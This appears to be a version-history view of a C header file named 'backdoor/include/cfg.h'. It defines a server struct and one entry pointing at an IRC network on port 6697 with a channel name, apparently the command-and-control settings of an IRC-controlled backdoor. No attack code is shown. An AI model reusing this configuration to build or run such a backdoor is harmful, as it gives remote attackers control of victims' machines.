backdoor/include/cfg.h

14 lines
190 B
C
Raw Normal View History

2024-04-21 16:39:15 +00:00
typedef struct {
int use_ssl;
char *ip;
int port;
char *pre_cmd;
char *channel;
char *channel_key;
} SERVER;
SERVER servers[] = {
2024-04-27 09:36:45 +00:00
{1, "irc.rizon.net", 6697, NULL, "#blbl", NULL}
2024-04-21 16:39:15 +00:00
};